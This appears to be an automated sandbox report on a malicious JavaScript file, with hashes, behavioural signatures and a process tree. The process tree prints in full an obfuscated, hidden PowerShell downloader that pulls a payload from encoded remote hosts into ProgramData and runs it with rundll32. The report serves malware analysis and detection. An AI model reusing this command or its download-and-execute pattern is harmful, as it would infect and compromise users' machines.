Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17/05/2023, 13:04
Static task
static1
Behavioral task
behavioral1
Sample
Sibvkun.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Sibvkun.js
Resource
win10v2004-20230220-en
General
-
Target
Sibvkun.js
-
Size
241KB
-
MD5
1d6d1cb15fb711583a7e657342949114
-
SHA1
4f97fa7226a780dd1a83251dfe52cec1bdc3f9ff
-
SHA256
fd6447c1e9b59d7114534e32bd988bd00fb674bcecc4c3d958b096bfc06b4aca
-
SHA512
334503fc7f116c350871e6c2185c190b8602f41eaf3bb650bf6bcfcdaaae557b047c2b2fae3b7cf5b114fc3f78229433aa2f72652ae395658f0c30946d405df4
-
SSDEEP
6144:AI5LBbVZoqY0hM9wJZv9KuoZ/pkn5Txp/k:AI5j2J
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 21 4292 powershell.exe 22 4292 powershell.exe 26 4292 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4292 powershell.exe 4292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4292 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4052 wrote to memory of 5088 4052 wscript.exe 82 PID 4052 wrote to memory of 5088 4052 wscript.exe 82 PID 5088 wrote to memory of 4292 5088 wscript.exe 83 PID 5088 wrote to memory of 4292 5088 wscript.exe 83
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Sibvkun.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Sibvkun.js" commandoRememorize disulfonic2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "$ p s e u d o s u c h i a n   =   " a A B 0 A H Q A c A A 6 A C 8 A L w B j A G E A c g B h A G 4 A Z w B p A G Q A c w B H A G U A c g B t A G E A b g B v A H A A a A B v A G I A Z Q A u A G g A b w B s A G k A Z A B h A H k A g I a A B 0 A H Q A c A A 6 A C 8 A L w B l A H E A d Q B p A H A A b w B 0 A G U A b g B 0 A G k A Y Q B s A G k A d A B 5 A F M A a Q B n A G w A d Q B t A C 4 A a Q B u A A = = " ; $ s u b d i v i d i n g   =   " a A B 0 A H Q A c A A 6 A C 8 A L w A x A D I A M A A u A D Q A M w A u A D c A O A A u A D g A O Q A = V N l a A B 0 A H Q A c A A 6 A C 8 A L w A x A D g A N Q A u A D E A N g A 1 A C 4 A N A A z A C 4 A M Q A 2 A D U A " ; $ H e x a m i t i a s i s   =   " c h o l e t e l i n " ; S t a r t - S l e e p   - S e c o n d s   1 3 ; $ U n t h u m p e d   =   " a n i s o d o n t " ; $ B e e k e e p e r T r a b u c o s   =   " a A B 0 A H Q A c A A 6 A C 8 A L w A x A D U A O A A u A D I A N Q A 1 A C 4 A M g A x A D M A L g A x A D g A M Q A v A G 0 A a Q B S A C 8 A Q w A 0 A E w A M w B W A D E A T w B M A D g A R w B Q A E c A P a A B 0 A H Q A c A A 6 A C 8 A L w A x A D Q A O Q A u A D E A N Q A 0 A C 4 A M Q A 1 A D g A L g A 5 A D E A L w B Y A G 4 A Z A A v A H Y A d Q B W A G w A U A B 5 A D M A Z Q B 6 A G w A R g A = P a A B 0 A H Q A c A A 6 A C 8 A L w A x A D Y A M g A u A D I A N Q A y A C 4 A M Q A 3 A D I A L g A 1 A D Q A L w A 5 A E c A U Q A 1 A E E A O A A v A D A A a g A 3 A G s A S g B F A G c A b Q B Y A F Y A " ; f o r e a c h   ( $ p u f f b a c k   i n   $ B e e k e e p e r T r a b u c o s   - s p l i t   " P " )   { $ m e t r i c i s i n g   =   " a A B 0 A H Q A c A A 6 A C 8 A L w A x A D I A M w A u A D c A N g A u A D E A M g A 3 A C 4 A N A A 3 A A = = " ; $ C h i c h i s   =   " a A B 0 A H Q A c A B z A D o A L w A v A H A A c w B l A H U A Z A B v A H M A d A B p A G c A b Q B h A H Q A a Q B j A C 4 A Z g B s A G 8 A c g B p A H M A d A A = L a A B 0 A H Q A c A B z A D o A L w A v A D I A M g A x A C 4 A N Q A 3 A C 4 A M Q A y A D M A L g A 4 A D U A L a A B 0 A H Q A c A A 6 A C 8 A L w B Q A H I A b w B 0 A G U A c g B 2 A G k A d A B 5 A C 4 A d Q B z A A = = L a A B 0 A H Q A c A B z A D o A L w A v A H Y A d Q B s A H Q A d Q B y A G k A c w B o A E U A c g B l A G 0 A a Q B 0 A G E A b A A u A G o A b w B i A H U A c g B n A A = = " ; $ a m p u t a t i o n a l D i e r e t i c   =   7 0 5 ; t r y   { $ n o n s i t t i n g E x p e n s i v e l y   =   " O v e r p r e s u m p t u o u s " ; $ S h i v a h s D e l a y e r s   =   1 7 0 ; $ n e v a d a n B e n e l u x   =   " a A B 0 A H Q A c A A 6 A C 8 A L w B o A G 8 A d Q B z A G U A d A B v A H A A R Q B 1 A H I A Y Q B z A G k A Y Q A u A H A A b w B r A G U A c g A = " ; $ P h o t o k i n e s i s F o c a l i s a t i o n   =   [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ p u f f b a c k ) ) ; i w r   $ P h o t o k i n e s i s F o c a l i s a t i o n   - O   C : \ P r o g r a m D a t a \ b i s b e e i t e U n t a b u l a t e d . p e l v i s t e r n a l U n v o i c i n g ; $ O r d e r l e s s N e u r o f i b r i l l a e   =   " a A B 0 A H Q A c A B z A D o A L w A v A D E A N Q A 4 A C 4 A M Q A 0 A D Y A L g A y A D E A N Q A u A D k A M Q A = " ; $ d i h y d r o c u p r i n   =   " p e e w e e p " ; $ T w e e s h t U n l a b o r e d   =   3 0 5 ; i f   ( ( G e t - I t e m   - P a t h   C : \ P r o g r a m D a t a \ b i s b e e i t e U n t a b u l a t e d . p e l v i s t e r n a l U n v o i c i n g ) . L e n g t h   - g e   1 7 6 5 6 4 ) { p o w e r s h e l l   - e n c o d e d c o m m a n d   " c w B 0 A G E A c g B 0 A C A A c g B 1 A G 4 A Z A B s A G w A M w A y A C A A Q w A 6 A F w A U A B y A G 8 A Z w B y A G E A b Q B E A G E A d A B h A F w A Y g B p A H M A Y g B l A G U A a Q B 0 A G U A V Q B u A H Q A Y Q B i A H U A b A B h A H Q A Z Q B k A C 4 A c A B l A G w A d g B p A H M A d A B l A H I A b g B h A G w A V Q B u A H Y A b w B p A G M A a Q B u A G c A L A B E A G w A b A B S A G U A Z w B p A H M A d A B l A H I A U w B l A H I A d g B l A H I A O w B B A G 4 A Z w B 1 A G w A Y Q B y A A = = " ; $ m u s e u m C o p t i c   =   " a A B 0 A H Q A c A B z A D o A L w A v A H o A b w B k A G k A Y Q B j A H M A U g B l A G M A b w B u A G Y A a Q B z A G M A Y Q B 0 A G U A Z A A u A H Q A c g B h A G k A b g B p A G 4 A Z w A = z X z D a A B 0 A H Q A c A B z A D o A L w A v A F U A b g B y A G U A Z Q B s A E Q A Y Q B 1 A G I A a Q B u A G c A b A B 5 A C 4 A Y w B h A G 0 A Z Q B y A G E A z X z D a A B 0 A H Q A c A A 6 A C 8 A L w A x A D c A O A A u A D I A M A A 0 A C 4 A M Q A 1 A D M A L g A x A D k A M Q A = " ; $ i n e q u i g r a n u l a r   =   " o b i t u a r i l y C a n c h a l a g u a " ; b r e a k ; A n g u l a r ; } A n g u l a r ; }   c a t c h   { $ t h a t a w a y E p i c a l   =   " a A B 0 A H Q A c A B z A D o A L w A v A D E A N w A 3 A C 4 A M Q A 2 A D I A L g A x A D U A M g A u A D c A N Q A = t Y g R a A B 0 A H Q A c A B z A D o A L w A v A G M A b w B j A G g A b A B l A G E A d A B l A G Q A U g B l A G Q A c g B h A G Y A d A B z A C 4 A d A B v A H k A c w A = t Y g R a A B 0 A H Q A c A B z A D o A L w A v A D E A M g A z A C 4 A M g A x A D M A L g A y A D M A M Q A u A D U A M A A = " ; } } $ F l o r e a t e d N o n p r o t r u s i o n   =   " a A B 0 A H Q A c A B z A D o A L w A v A E M A Y Q B u A H o A b w B u A G U A d A B 0 A G E A U g B l A H Y A Z Q B y A H M A Z Q B m A H U A b A A u A G M A b w B 1 A G 4 A d A B y A H k A = t R a A B 0 A H Q A c A B z A D o A L w A v A G Q A Z Q B z A G E A b A B p A G 4 A a Q B 6 A G U A L g B j A H o A = t R a A B 0 A H Q A c A A 6 A C 8 A L w B j A H U A b A B l A H Q A c w B H A G E A c g B l A G Y A b w B 3 A G w A L g B i A G U A Z Q B y A A = = = t R a A B 0 A H Q A c A B z A D o A L w A v A D I A M w A 5 A C 4 A M g A 1 A D A A L g A x A D Y A O A A u A D E A N w A 2 A A = = " ; A n g u l a r ; "3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82